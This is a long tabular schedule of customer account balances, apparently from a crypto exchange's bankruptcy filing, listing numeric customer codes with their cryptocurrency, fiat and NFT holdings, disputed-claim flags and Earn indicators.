| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317063 | | BAT[1], CUSDT[22], DOGE[18.85394673], LINK[24.49186135], SHIB[5220046.48464820], USD[0.02] | | |
| 07317064 | | BRZ[1], CUSDT[6], DOGE[1197.71330846], ETH[.03123286], ETHW[.03084895], GRT[1.00367791], TRX[1], USD[0.00] | Yes | |
| 07317065 | | DOGE[1123.95064283], TRX[1], USD[216.14] | | |
| 07317066 | | BRZ[1], CUSDT[2], DOGE[.00003406], TRX[3], USD[0.01], USDT[1] | | |
| 07317068 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07317070 | | BRZ[1], TRX[2], USD[0.00] | | |
| 07317071 | | CUSDT[2], DOGE[1353.84205858], ETH[0], ETHW[0.10874594], SHIB[2], USD[0.00], USDT[0.00092256] | Yes | |
| 07317072 | | DOGE[54.78], USD[0.10] | | |
| 07317073 | | BAT[3], BRZ[1], CUSDT[1], ETH[0], ETHW[0], TRX[5], USD[0.00] | | |
| 07317074 | | ETH[.00001178], ETHW[.00001178], USD[17.0034504] | | |
| 07317075 | | BTC[.2303984], SHIB[799200], USD[0.75] | | |
| 07317077 | | DOGE[0], USD[0.00] | | |
| 07317078 | | USD[10.00] | | |
| 07317079 | | USD[10.00] | | |
| 07317083 | | BTC[0], SOL[0], SUSHI[0], USD[0.99] | | |
| 07317084 | | USD[10.00] | | |
| 07317087 | | BAT[3], BRZ[3], BTC[0], CUSDT[11], DAI[0], DOGE[4], ETH[0], GRT[5], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[5], UNI[0], USD[0.00], USDT[2], YFI[0] | | |
| 07317088 | | BAT[1], CUSDT[5], TRX[4], USD[0.00] | | |
| 07317089 | | USD[11.07] | Yes | |
| 07317091 | | DOGE[.883], ETH[0], NFT (509575429472474701/Humpty Dumpty #1403)[1] | | |
| 07317093 | | USD[10.00] | | |
| 07317094 | | BRZ[1], BTC[.01663778], CHF[58.99], CUSDT[20], DOGE[2], ETH[.19000544], ETHW[7.11281036], NFT (482209429271521809/Saudi Arabia Ticket Stub #2168)[1], SHIB[4], SOL[4.78643473], TRX[5], USD[156.06] | Yes | |
| 07317095 | | CUSDT[8], DOGE[39.42309221], LTC[.00000758], TRX[75.35197631], USD[0.73] | Yes | |
| 07317097 | | AAVE[.15984], BTC[.01825995], DOGE[15.984], MATIC[29.97], SOL[2.93697942], USD[1.00] | | |
| 07317099 | | DOGE[1296.97563434], USD[0.00] | | |
| 07317100 | | CUSDT[4], USD[55.18] | | |
| 07317101 | | BTC[.0000988], DOGE[.404], USD[34.92] | | |
| 07317102 | Contingent, Disputed | BTC[0], ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07317105 | | BRZ[2], BTC[0], CUSDT[13], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[12.37064844], USD[0.00], USDT[2.20711338] | Yes | |
| 07317106 | | CUSDT[1], DOGE[6431.38145359], TRX[2], USD[0.00] | Yes | |
| 07317107 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07317108 | | BF_POINT[900], MATIC[0], USD[0.00] | Yes | |
| 07317109 | | USD[10.00] | | |
| 07317110 | | TRX[215.98282787], USD[0.00] | | |
| 07317111 | | BAT[1.01655549], BRZ[1], BTC[0], CUSDT[5], DOGE[2], GRT[2.06341194], SOL[0], SUSHI[1.09806021], TRX[7], USD[0.00], USDT[2.19716705] | Yes | |
| 07317112 | | DOGE[0.13681651], ETH[0.16832400], ETHW[0.16832400], USD[1.47] | | |
| 07317113 | | DOGE[.73665572], USD[0.00], USDT[.09889311] | | |
| 07317114 | | USD[10.00] | | |
| 07317115 | | USD[0.00] | | |
| 07317117 | | BTC[.000019], TRX[.872], USD[0.00], USDT[0] | | |
| 07317118 | | USD[10.00] | | |
| 07317119 | | CUSDT[1], TRX[2], USD[649.48], USDT[0.00000001] | Yes | |
| 07317120 | | SOL[0], USD[0.00], USDT[.2535025] | | |
| 07317121 | | CUSDT[4], TRX[1], USD[0.02], USDT[1.10955937] | Yes | |
| 07317122 | | BTC[.00007991], DOGE[.4356], ETH[.00889905], ETHW[.00066299], USD[1.45], USDT[0] | | |
| 07317123 | | BAT[1], BRZ[5], BTC[0], CUSDT[3], ETH[0], ETHW[0], SUSHI[0], TRX[5], USD[0.00], USDT[1], YFI[0] | | |
| 07317125 | | DOGE[266.04603385], USD[10.00] | | |
| 07317126 | | USD[10.00] | | |
| 07317128 | | CUSDT[4], DOGE[317.09489012], ETH[.00888547], ETHW[.00888547], SOL[1.2509029], TRX[1], USD[0.00] | | |
| 07317130 | | CUSDT[1], DOGE[0], SOL[0], TRX[0], USD[30.08] | | |
| 07317132 | | BTC[0], USD[0.01] | | |
| 07317133 | | DOGE[782.50105210], TRX[0.82981564], USD[0.32], USDT[.34001016] | | |
| 07317135 | | DOGE[1], GRT[3.98208273], USD[0.00] | | |
| 07317136 | | DOGE[.237], USD[53.48] | | |
| 07317138 | | BTC[.0009666], DOGE[1], ETH[.00517813], ETHW[.00517813], USD[0.00] | | |
| 07317140 | | USD[10.00] | | |
| 07317141 | | BRZ[3], CUSDT[6], DOGE[1139.66695321], SOL[10.57764851], TRX[5], USD[0.00], USDT[2.20646855] | Yes | |
| 07317142 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317143 | | USD[10.00] | | |
| 07317145 | | USD[10.00] | | |
| 07317146 | | DOGE[185.024], USD[0.00] | | |
| 07317148 | | DOGE[53.63045463], USD[0.00] | | |
| 07317150 | | BTC[0], DOGE[0], TRX[0], UNI[0], USD[0.00] | | |
| 07317154 | | CUSDT[1], DOGE[2637.70038618], TRX[1], USD[0.00] | | |
| 07317155 | | BF_POINT[300], DOGE[2], ETH[.00015312], ETHW[.00015312], SHIB[1], SOL[0], USD[0.00], USDT[0] | | |
| 07317157 | | ETH[0], USD[0.00] | | |
| 07317158 | | USD[10.00] | | |
| 07317159 | | USD[10.00] | | |
| 07317162 | | BRZ[0], BTC[.00000061], DOGE[0], USD[0.00], USDT[0] | | |
| 07317165 | | USD[10.00] | | |
| 07317166 | | BCH[.00015119], BRZ[2], CUSDT[16], DOGE[8961.64421255], SHIB[27668.98418972], SOL[.0411552], TRX[2.00001537], USD[20.06] | Yes | |
| 07317167 | | BAT[0], BRZ[12.67420967], BTC[.00000043], CUSDT[14], DOGE[1], ETH[0], GRT[1], LTC[0], SOL[.00015861], TRX[5], UNI[0], USD[0.00], USDT[2.1404172] | Yes | |
| 07317168 | | USD[10.00] | | |
| 07317169 | | BRZ[1], CUSDT[1], USD[0.01], USDT[0] | | |
| 07317170 | | USD[10.00] | | |
| 07317172 | | CUSDT[4], DOGE[5.13132928], LINK[0], LTC[0], USD[0.00], USDT[0.00000020] | Yes | |
| 07317173 | | USD[10.00] | | |
| 07317175 | | BTC[0], DOGE[0], TRX[0], USD[0.29], USDT[0] | Yes | |
| 07317177 | | BAT[1], BTC[0], DOGE[2], LINK[0], TRX[1], USD[0.00] | | |
| 07317178 | | USD[10.00] | | |
| 07317179 | | USD[10.00] | | |
| 07317180 | | BRZ[1], DOGE[1.79695551], USD[200.01] | | |
| 07317181 | | USD[10.00] | | |
| 07317182 | | USD[49.94] | | |
| 07317183 | | ALGO[0], AVAX[0.84305343], ETH[0.00000001], LINK[0], MATIC[0], USD[36.57], USDT[0] | Yes | |
| 07317186 | | USD[10.00] | | |
| 07317187 | | BTC[0], DOGE[0] | | |
| 07317188 | | USD[0.00] | | |
| 07317189 | | USD[0.06] | | |
| 07317192 | | USD[10.00] | | |
| 07317195 | | CUSDT[2], DOGE[0], USD[0.80] | | |
| 07317197 | | USD[10.00] | | |
| 07317198 | | USD[0.01] | | |
| 07317199 | | BTC[.0011996] | | |
| 07317200 | | DOGE[0], SOL[2.63229985] | | |
| 07317201 | | BAT[144.36506233], BTC[0], DOGE[89.57252254], GRT[84.78086412], SOL[3.96495923], SUSHI[2.28036803], UNI[.54827516], USD[0.00] | Yes | |
| 07317202 | | USD[10.00] | | |
| 07317203 | | BAT[1], CUSDT[3], DOGE[174.73323045], SOL[0], UNI[1], USD[0.00] | | |
| 07317204 | | BAT[2.01049321], BRZ[3], DOGE[2], TRX[1.000001], USD[0.00], USDT[0] | Yes | |
| 07317205 | | BAT[1], BRZ[1], CUSDT[9], DOGE[18.76328675], GRT[175.19385088], LINK[3.7508742], PAXG[.02885821], SOL[49.09573377], SUSHI[13.70809577], TRX[1638.41880296], UNI[3.92809898], USD[0.00], USDT[1.02016743], YFI[.00243861] | Yes | |
| 07317206 | | CUSDT[1], DOGE[39221.58165912], ETH[0], USD[0.00] | | |
| 07317208 | | GRT[.388], USD[2.29] | | |
| 07317209 | | BRZ[1], BTC[0], CUSDT[1], DOGE[1], SOL[0], TRX[1], USD[0.00] | | |
| 07317211 | | USD[10.00] | | |
| 07317213 | | USD[10.00] | | |
| 07317215 | | BAT[1.0165555], BRZ[1], BTC[0], CUSDT[1], LINK[.3599771], TRX[2], USD[0.00], USDT[0.00000046] | Yes | |
| 07317216 | | USD[0.54] | | |
| 07317217 | | DOGE[1.00003846], TRX[1], USD[0.00] | | |
| 07317218 | | USD[0.47] | | |
| 07317219 | | CUSDT[2], DOGE[404.38392261], ETH[.32479071], ETHW[.32479071], GRT[1], LTC[1.74676231], USD[0.00] | | |
| 07317220 | | DOGE[41.33721708], USD[0.00] | Yes | |
| 07317225 | | CUSDT[4], ETHW[.09624758], SHIB[4], TRX[256.56807128], USD[0.07] | Yes | |
| 07317226 | | ETHW[.0001974], LINK[2.16676176], USD[0.00] | Yes | |
| 07317228 | | USD[10.00] | | |
| 07317230 | | BRZ[1], CUSDT[1], DOGE[217.47638587], TRX[1], USD[0.06] | | |
| 07317232 | | BAT[1.01480842], BRZ[1], CUSDT[4], GRT[1.0031345], TRX[1.00344941], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317235 | | USD[10.00] | | |
| 07317237 | | USD[0.01], USDT[0.00059031] | Yes | |
| 07317238 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07317239 | | DOGE[1], USD[0.00] | | |
| 07317240 | | BTC[.00045706], USD[0.00] | Yes | |
| 07317243 | | USD[10.00] | | |
| 07317245 | | BAT[1], BRZ[1], CUSDT[3], DOGE[0], TRX[4], USD[0.00], USDT[1] | | |
| 07317246 | | USD[0.00] | | |
| 07317247 | | BAT[1], CUSDT[2], ETH[0], TRX[1], USD[0.00], USDT[1] | | |
| 07317248 | | USD[10.00] | | |
| 07317250 | | CUSDT[2], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07317252 | | GRT[.02753406], USD[0.00] | | |
| 07317253 | | CUSDT[2], USD[0.00] | | |
| 07317254 | | USD[10.00] | | |
| 07317256 | | DOGE[6565.428], USD[0.06] | | |
| 07317257 | | DOGE[12.666], USD[0.01] | | |
| 07317259 | | USD[10.00] | | |
| 07317261 | | BRZ[1], BTC[0], CUSDT[2], DOGE[3], GRT[2.08260683], SHIB[2], SOL[0.01822853], SUSHI[.00001178], TRX[2], USD[0.00] | Yes | |
| 07317262 | | BTC[0], ETH[1.12656031], ETHW[1.12656031], MATIC[9.449], SHIB[21035020.40274132], SOL[.006067], USD[1.67] | | |
| 07317268 | | BTC[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07317272 | | DOGE[0], ETH[0], ETHW[0], USD[0.01] | | |
| 07317273 | | USD[10.00] | | |
| 07317275 | | CUSDT[1], DAI[0], DOGE[2], ETH[0], LTC[0], NFT (38882354109336233/Inferno Skull #3)[1], TRX[0], USD[0.00] | Yes | |
| 07317276 | | USD[10.00] | | |
| 07317277 | | DOGE[0], USD[0.00] | | |
| 07317278 | | CUSDT[1], DOGE[0], ETH[0], SHIB[1], SOL[0], TRX[0], USD[0.01] | Yes | |
| 07317279 | | BRZ[3], CUSDT[2], DOGE[1], TRX[5], USD[10.00] | | |
| 07317280 | | DOGE[0.49896587], USD[0.00] | | |
| 07317282 | | AVAX[0], BRZ[2], CUSDT[5], DOGE[7.00057537], ETHW[.72966843], GRT[1], LINK[0], NFT (544491303545352412/Entrance Voucher #3524)[1], SHIB[29], SOL[0.00007301], TRX[15.00025571], USD[0.79], USDT[1.02033171] | Yes | |
| 07317283 | | USD[10.00] | | |
| 07317284 | | BTC[.0024614], CUSDT[4], DOGE[5], ETH[.04875569], ETHW[.04875569], TRX[394.30066397], USD[0.01] | | |
| 07317285 | | DOGE[29.16981396], USD[10.00] | | |
| 07317287 | | DOGE[1], ETH[.01531576], ETHW[.0141342], GRT[0], NFT (313225598358391116/The Blow Dryer Galaxy V1 - Edition/5)[1], NFT (490120159750711895/Barcelona Ticket Stub #2015)[1], NFT (545544223887779478/The Eagle Nebula #2)[1], SHIB[3], SOL[0.00000001], USD[0.00], USDT[0] | Yes | |
| 07317292 | | USD[0.00] | Yes | |
| 07317293 | | USD[10.00] | | |
| 07317295 | | USD[10.00] | | |
| 07317296 | | USD[10.00] | | |
| 07317297 | | CUSDT[1], SHIB[152051.75689372], USD[0.00] | | |
| 07317298 | | BTC[.00000095], DOGE[1], ETH[.00000104], ETHW[0.11163931], USD[0.00] | Yes | |
| 07317300 | | CUSDT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07317302 | | BTC[0], ETH[-0.00000001], ETHW[0], LINK[0], SOL[182.41737611], USD[0.00] | Yes | |
| 07317303 | | DOGE[4.55891884], USD[0.01] | Yes | |
| 07317307 | | USD[32.92] | | |
| 07317308 | | USD[10.00] | | |
| 07317309 | | BAT[1.01074153], BTC[.00038286], DOGE[1], GRT[3.02367815], NFT (322048335645979295/Romeo #857)[1], SHIB[2], SUSHI[1.07188873], TRX[1], USD[0.00] | Yes | |
| 07317310 | | USD[11.02], USDT[10871.72816623] | Yes | |
| 07317312 | | USD[10.00] | | |
| 07317313 | | BRZ[2], DOGE[12700.84920328], TRX[1], USD[10.00] | | |
| 07317314 | | USD[10.00] | | |
| 07317315 | | BRZ[1], CUSDT[7], DOGE[0], ETH[0], TRX[3], USD[0.00] | | |
| 07317317 | | BAT[28.53702991], BRZ[1], CUSDT[6], DOGE[0], ETH[0], ETHW[0], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07317319 | | ETH[.18996726], ETHW[0.18974754], USD[10.69] | Yes | |
| 07317320 | | USD[30.00] | | |
| 07317321 | | DOGE[1], ETH[.14456613], ETHW[.14456613], USD[10.00] | | |
| 07317322 | | USD[10.00] | | |
| 07317323 | | DOGE[1], USD[0.00] | | |
| 07317328 | | USD[0.00] | | |
| 07317329 | | DOGE[.0000006], USD[312.92] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317330 | | BRZ[1], BTC[0], CUSDT[2], DOGE[123.56401575], USD[0.00] | Yes | |
| 07317331 | | SOL[.66256467], USD[0.00] | | |
| 07317333 | | BTC[0], DOGE[0], ETH[0] | | |
| 07317334 | | BRZ[0.00007541], CUSDT[1], ETH[0], USD[0.00] | | |
| 07317335 | | BTC[0], GRT[.00019768], USD[0.00] | | |
| 07317336 | | DOGE[1], USD[0.00] | Yes | |
| 07317338 | | BTC[.00005], USD[1.12] | | |
| 07317339 | | USD[10.00] | | |
| 07317342 | | TRX[0], USD[0.00] | Yes | |
| 07317343 | | NFT (382851134071333880/Vintage Sahara #692)[1], USD[4.21] | | |
| 07317344 | | BTC[0], DOGE[0], NFT (413144077116972470/Solninjas #269)[1], NFT (445323818436159500/Rubber Duckie #0022 - Lava Duckie )[1], NFT (530920007868456717/Rubber Duckie #0009[1], NFT (546250858460341468/Primordial Exodus )[1], SOL[1.27372382], USD[0.07], USDT[0] | | |
| 07317345 | | USD[10.00] | | |
| 07317346 | | CUSDT[2], DOGE[2860.82792376], USD[0.00] | Yes | |
| 07317347 | | BTC[0], USD[5070.95], USDT[0] | | |
| 07317348 | | BTC[.0000023], CUSDT[16], DOGE[0.32283108], KSHIB[.05780781], TRX[2.14147924], USD[0.03], USDT[.0004977] | | |
| 07317350 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[3.87703583], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07317351 | | USD[0.07] | | |
| 07317354 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07317355 | | DOGE[0], ETH[0], USD[0.04] | | |
| 07317356 | Contingent, Disputed | BTC[.00000001], ETH[.00039614], USD[0.01], USDT[0] | Yes | |
| 07317358 | | SOL[.161503], USD[0.02] | | |
| 07317360 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], GRT[0], LINK[5.35415784], SOL[18.40204654], TRX[2], USD[0.00] | Yes | |
| 07317362 | | USD[10.00] | | |
| 07317363 | | SUSHI[.50420591], TRX[1], USD[0.00] | | |
| 07317368 | | USD[10.00] | | |
| 07317370 | | BTC[0], DOGE[0], SOL[0.00001411], USD[0.00] | | |
| 07317372 | | CUSDT[2], DOGE[299.46681776], USD[0.00] | | |
| 07317373 | | USD[0.00] | | |
| 07317375 | | BTC[.0011223], DOGE[1], SOL[10.25977014], USD[0.10] | | |
| 07317376 | | USD[10.00] | | |
| 07317377 | | BTC[.00005946], DOGE[0.69228369], USD[24.25] | | |
| 07317379 | | DOGE[.815], USD[101.07], USDT[96.71923932] | | |
| 07317380 | | BTC[0], ETH[0.06586145], ETHW[0.06586145], SOL[12], USD[0.26] | | |
| 07317381 | | BAT[1], BRZ[1], CUSDT[2], DOGE[0], GRT[1], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], YFI[0] | | |
| 07317382 | | BRZ[6.52011147], CUSDT[8], TRX[5], USD[0.00], USDT[1.10920481] | Yes | |
| 07317383 | | USD[10.00] | | |
| 07317384 | | DOGE[15564.42] | | |
| 07317385 | | USD[0.00] | Yes | |
| 07317386 | | TRX[219.17649615], USD[0.00] | Yes | |
| 07317387 | | GRT[7695.297], LINK[483.1164], USD[2.73] | | |
| 07317388 | | USD[10.00] | | |
| 07317390 | | USD[0.00] | | |
| 07317392 | | USD[10.00] | | |
| 07317393 | | USD[10.00] | | |
| 07317395 | | CUSDT[3], USD[0.00] | | |
| 07317400 | | DOGE[152.74285694], USD[0.00] | | |
| 07317401 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07317402 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.30] | Yes | |
| 07317405 | | DOGE[3331.197], USD[130.43] | | |
| 07317406 | | BRZ[0], BTC[0], DOGE[0], ETH[0.00000001], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07317408 | | USD[10.00] | | |
| 07317411 | | BTC[0], USD[0.00] | | |
| 07317413 | | USD[10.00] | | |
| 07317416 | | TRX[2], USD[0.94] | | |
| 07317417 | | USD[0.01] | | |
| 07317420 | | BTC[0], DOGE[1], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07317421 | | USD[10.00] | | |
| 07317423 | | USD[0.04] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317424 | | TRX[1], USD[0.01] | | |
| 07317425 | Contingent, Disputed | USD[1.29] | | |
| 07317428 | | MATIC[.00006511], USD[0.00] | Yes | |
| 07317429 | | USD[10.00] | | |
| 07317430 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07317431 | | DOGE[12], USDT[0] | | |
| 07317434 | | USD[10.00] | | |
| 07317435 | | CUSDT[1], DOGE[.0999927], TRX[1], USD[0.25] | | |
| 07317436 | | USD[10.00] | | |
| 07317439 | | BRZ[0], ETH[15.29019489], ETHW[15.28500418], USD[65.32], USDT[0] | Yes | |
| 07317440 | | BAT[1.48411856], CUSDT[14], DOGE[2.87757268], TRX[14.29519082], USD[0.00], USDT[0.00000001] | Yes | |
| 07317441 | | DOGE[527.30005639], TRX[1], USD[0.00] | | |
| 07317442 | | BRZ[2], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07317444 | | USD[30.00] | | |
| 07317446 | | DOGE[0] | | |
| 07317449 | | CUSDT[1], USD[0.78] | | |
| 07317450 | | SOL[.0676991], USD[0.00] | Yes | |
| 07317451 | | USD[17.31] | | |
| 07317453 | | BTC[0], ETH[0], ETHW[0], LINK[0], LTC[0], SUSHI[0], USD[0.00] | | |
| 07317454 | | BRZ[1], CUSDT[3], SOL[0], USD[0.60] | | |
| 07317457 | | TRX[83.00135687], USD[0.38] | | |
| 07317458 | | BTC[0], ETH[.00375], ETHW[.00375] | | |
| 07317459 | | DOGE[10169.82], USD[80.03] | | |
| 07317460 | | USD[10.00] | | |
| 07317461 | | USD[10.00] | | |
| 07317463 | | ETH[.009], ETHW[.009], USD[10.00] | | |
| 07317466 | | BF_POINT[100], BTC[0], ETHW[0], SHIB[1], SOL[0], UNI[.00000001], USD[50.83], USDT[0] | Yes | |
| 07317467 | | USD[10.00] | | |
| 07317468 | | USD[0.00] | | |
| 07317469 | | CUSDT[3], DOGE[3], USD[0.00] | | |
| 07317471 | | USD[10.00] | | |
| 07317472 | | CUSDT[2], USD[0.29] | | |
| 07317473 | | USD[10.00] | | |
| 07317475 | | CUSDT[7], DOGE[105.41873669], TRX[1], USD[0.00] | Yes | |
| 07317476 | | BTC[0], CUSDT[21], DOGE[0.15544299], ETH[.00000001], ETHW[0], GRT[0], LINK[0], USD[0.00], USDT[0] | Yes | |
| 07317478 | | USD[10.00] | | |
| 07317480 | | GRT[.91787238] | | |
| 07317482 | | USD[0.00] | | |
| 07317483 | | USD[1.84] | | |
| 07317485 | | ETH[0], ETHW[0], UNI[0], USD[0.24] | | |
| 07317487 | | SOL[0], USD[0.00], USDT[0.00000030] | | |
| 07317489 | | AVAX[2.49837079], BTC[0], SHIB[4], USD[0.00] | Yes | |
| 07317491 | | USD[0.00], USDT[0] | | |
| 07317492 | | USD[10.00] | | |
| 07317493 | | USD[10.00] | | |
| 07317494 | | DOGE[.317], USD[0.00] | | |
| 07317495 | | BRZ[3], CUSDT[6], DOGE[5], LINK[59.9237941], LTC[7.58549631], TRX[2], USD[0.01], USDT[1] | | |
| 07317497 | | NFT (4424432026511160490/Bahrain Ticket Stub #2237)[1], USD[11.09] | Yes | |
| 07317498 | | USD[0.00] | Yes | |
| 07317499 | | TRX[3], USD[0.01] | | |
| 07317502 | | ETH[0.38131090], ETHW[0.38131090], USD[24455.39], USDT[0] | | |
| 07317504 | | BTC[0], DOGE[0.06795411], USD[0.00] | | |
| 07317506 | | BRZ[2], CUSDT[5], DOGE[2], TRX[3], USD[1.17] | | |
| 07317508 | | DOGE[.27452173], USD[0.59] | | |
| 07317509 | | BRZ[2], TRX[1], USD[0.00] | Yes | |
| 07317510 | | USD[0.00] | | |
| 07317511 | | USD[10.00] | | |
| 07317512 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317513 | | USD[10.00] | | |
| 07317515 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07317516 | | BTC[0], DOGE[0], USD[0.00], USDT[0] | | |
| 07317517 | | CUSDT[1], DOGE[837.52368729], USD[10.00] | | |
| 07317518 | | USD[10.00] | | |
| 07317519 | | USD[10.00] | | |
| 07317520 | | USD[0.00] | | |
| 07317521 | | USD[66.30] | Yes | |
| 07317522 | | BAT[2], BRZ[1], DOGE[1], TRX[3], USD[0.01], USDT[1] | | |
| 07317523 | | USD[30.57] | | |
| 07317524 | | BTC[.00018176], DOGE[767.5515557], USD[0.00] | Yes | |
| 07317525 | | USD[0.95] | | |
| 07317526 | | DOGE[501.77457307], USD[30.00] | | |
| 07317528 | | USD[0.43] | | |
| 07317530 | | USD[10.00] | | |
| 07317533 | | BRZ[2], CUSDT[8], TRX[3], USD[0.00] | | |
| 07317536 | | ETH[0], USD[0.00] | | |
| 07317537 | | BTC[0], DOGE[.5842], USD[0.05], USDT[.42526] | | |
| 07317538 | | DOGE[0], USD[0.07] | | |
| 07317540 | | BRZ[1], BTC[.00419659], CUSDT[2], DOGE[13.00002631], ETH[.48124444], ETHW[.48124444], LINK[15.8959639], TRX[5355.15296837], USD[0.00] | | |
| 07317542 | | USD[0.01] | | |
| 07317545 | | USD[10.00] | | |
| 07317548 | | CUSDT[29], DOGE[2], TRX[4], USD[0.00] | Yes | |
| 07317549 | | USD[10.00] | | |
| 07317551 | | USD[10.00] | | |
| 07317554 | | DOGE[.07107472], USD[0.00] | | |
| 07317555 | | AAVE[0], CUSDT[10], DAI[0], ETH[0], MATIC[0.59090680], SOL[0], TRX[6], USD[3.07] | Yes | |
| 07317556 | | USD[10.00] | | |
| 07317560 | Contingent, Disputed | USD[0.01] | | |
| 07317561 | | USD[10.00] | | |
| 07317567 | | USD[10.00] | | |
| 07317568 | | DOGE[1], USD[0.00] | | |
| 07317570 | | USD[10.00] | | |
| 07317571 | | USD[10.00] | | |
| 07317574 | | BRZ[1], BTC[0.00000046], CUSDT[20], DOGE[0], SHIB[2], TRX[5], USD[0.00] | | |
| 07317575 | | USD[0.00] | | |
| 07317576 | | USD[0.90] | | |
| 07317577 | | TRX[1568.404], USD[0.10], USDT[.00784652] | | |
| 07317578 | | LTC[.00008975], SHIB[2], TRX[1], USD[0.02] | Yes | |
| 07317580 | | TRX[2.997], USD[0.11] | | |
| 07317582 | | USD[10.00] | | |
| 07317585 | | DOGE[0], USD[0.00] | | |
| 07317586 | | USD[10.00] | | |
| 07317587 | | BAT[1.01538592], BRZ[1], BTC[0], DOGE[2], ETHW[.77767412], SOL[0.31881221], TRX[3], USD[0.00] | Yes | |
| 07317589 | Contingent, Disputed | USD[0.00] | | |
| 07317590 | | USD[10.00] | | |
| 07317592 | | BTC[0], DOGE[0], ETH[0], USD[0.08] | | |
| 07317593 | | NFT (5207942864589431 99/Digital Z #26)[1], SHIB[.00000027], USD[0.15] | Yes | |
| 07317594 | | BRZ[1], CUSDT[2], DOGE[1], TRX[3], USD[8.50] | | |
| 07317596 | | DOGE[0.50829233], ETH[0], MATIC[9.6], SOL[0], USD[0.92], USDT[0.00206235] | | |
| 07317599 | | USD[10.00] | | |
| 07317600 | | BTC[0], CUSDT[1], DOGE[2], ETH[0], KSHIB[0], NFT (324933603611834898/Frog #429)[1], NFT (447656385920629468/348)[1], NFT (473340494736446109/Cyber Frogs Ramen)[1], NFT (505119288438808983/ApexDucks #2509)[1], SOL[0], SUSHI[0], UNI[0], USD[0.00] | Yes | |
| 07317602 | | BTC[0], DOGE[1], ETH[0], GRT[1], SHIB[1], SOL[0], TRX[1], USD[0.01] | Yes | |
| 07317603 | | CUSDT[1], DOGE[1], GRT[5.21601244], USD[0.00] | | |
| 07317604 | | USD[10.00] | | |
| 07317605 | | DOGE[1], SHIB[140424.04292200], USD[0.00] | Yes | |
| 07317606 | | USD[10.00] | | |
| 07317607 | | BTC[0], CUSDT[3], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07317610 | | USD[0.00] | | |
| 07317611 | | BAT[2], BRZ[22], BTC[0], CUSDT[5], DAI[0], DOGE[2], GRT[1], LINK[0], TRX[9], UNI[0.00009991], USD[0.00], USDT[0.00001370] | | |
| 07317613 | | BRZ[4], BTC[0], CUSDT[11], SOL[0], SUSHI[.00001299], TRX[1], USD[0.01] | | |
| 07317614 | | CUSDT[3], DOGE[22.72117963], TRX[1], USD[0.98] | Yes | |
| 07317615 | | BTC[0], DOGE[150.13243020], GRT[1.00498957], USD[2.69], USDT[0] | Yes | |
| 07317616 | | USD[10.00] | | |
| 07317617 | | BF_POINT[300], BRZ[4], CUSDT[5], DOGE[5.02157675], GRT[36.24176414], LINK[1.09880739], MKR[.09433851], SHIB[3], SUSHI[5.36546485], TRX[6], USD[0.00] | Yes | |
| 07317618 | | DOGE[.00007141], ETH[.00000004], ETHW[.00000004], TRX[4], USD[0.00] | | |
| 07317619 | | BRZ[0], BTC[0], SOL[0], USD[0.10], USDT[0.00000001] | Yes | |
| 07317620 | | USD[10.00] | | |
| 07317621 | | USD[10.00] | | |
| 07317622 | | USD[0.01] | | |
| 07317623 | | CUSDT[4], DOGE[0], USD[0.00] | | |
| 07317627 | | USD[10.00] | | |
| 07317628 | | BTC[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07317630 | | CUSDT[1], DOGE[0], GRT[0], USD[0.00] | Yes | |
| 07317631 | | DOGE[393.27990567], USD[0.00] | | |
| 07317632 | | SHIB[18365.8652641], USD[0.00] | Yes | |
| 07317633 | | USD[0.01] | | |
| 07317634 | | BTC[.00170454], DOGE[53.18847282], USD[0.01] | | |
| 07317636 | | CUSDT[2], TRX[2.01054339], USD[10.00], USDT[0] | | |
| 07317637 | | BCH[0], BRZ[0], LINK[0], USD[0.01] | | |
| 07317642 | | USD[10.00] | | |
